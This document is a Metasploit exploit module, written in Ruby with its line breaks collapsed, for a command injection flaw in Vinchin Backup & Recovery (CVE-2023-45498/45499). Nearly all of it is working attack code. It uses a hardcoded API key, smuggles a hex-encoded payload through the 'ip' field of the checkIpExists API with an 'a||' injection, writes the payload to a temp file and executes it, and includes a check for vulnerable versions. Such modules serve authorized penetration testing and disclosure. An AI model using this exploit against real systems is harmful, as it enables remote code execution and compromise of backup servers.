Vinchin Backup And Recovery Command Injection

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Vinchin Backup and Recovery Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in Vinchin Backup & Recovery          v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the          checkIpExists API endpoint, an attacker can execute arbitrary commands as the          web server user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gregory Boddin (LeakIX)', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'References' => [          ['CVE', '2023-45498'],          ['CVE', '2023-45499'],          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],          ['URL', 'https://vinchin.com/'] # Vendor URL        ],        'DisclosureDate' => '2023-10-26',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ],          'AKA' => ['Vinchin Command Injection']        },        'Platform' => ['linux', 'unix'],        'Arch' => [ARCH_CMD],        'Targets' => [          ['Automatic', {}]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'        },        'Privileged' => false      )    )    register_options(      [        Opt::RPORT(443),        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),      ]    )  end  def exploit    hex_encoded_payload = payload.encoded.unpack('H*').first    formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join    temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"    command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),      'vars_get' => {        'm' => '30',        'f' => 'checkIpExists',        'k' => datastore['APIKEY']      },      'data' => "p={\"ip\":\"a||#{command}\"}"    })  end  def check    target_uri_path = normalize_uri(target_uri.path, 'login.php')    res = send_request_cgi('uri' => target_uri_path)    return CheckCode::Unknown('Failed to connect to the target.') unless res    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/    version_match = res.body.match(version_pattern)    unless version_match && version_match[1]      return CheckCode::Unknown('Unable to extract version.')    end    version = Rex::Version.new(version_match[1])    print_status("Detected Vinchin version: #{version}")    if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||       (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||       (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||       (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))      return CheckCode::Appears    else      return CheckCode::Safe    end  endend